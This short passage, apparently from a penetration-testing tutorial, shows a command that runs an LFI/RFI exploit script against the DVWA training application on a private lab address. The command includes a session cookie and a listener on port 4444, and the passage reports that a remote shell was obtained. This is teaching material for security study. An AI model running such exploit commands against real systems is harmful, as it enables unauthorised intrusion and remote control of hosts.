To execute and exploit the RFI vulnerability, we will pass the following parameters to the script:
python LFI_RFI.py 192.168.1.102 http://192.168.1.102/dvwa/login.php http://192.168.1.102/dvwa/vulnerabilities/fi/ page 1 "security=low;PHPSESSID=5c6uk2gvq4q9ri9pkmprbvt6u2" 192.168.1.102 4444 0 0
The preceding command would produce the output, as shown in the following screenshot:
As we can see, we successfully obtained the shell for the RFI vulnerability as well.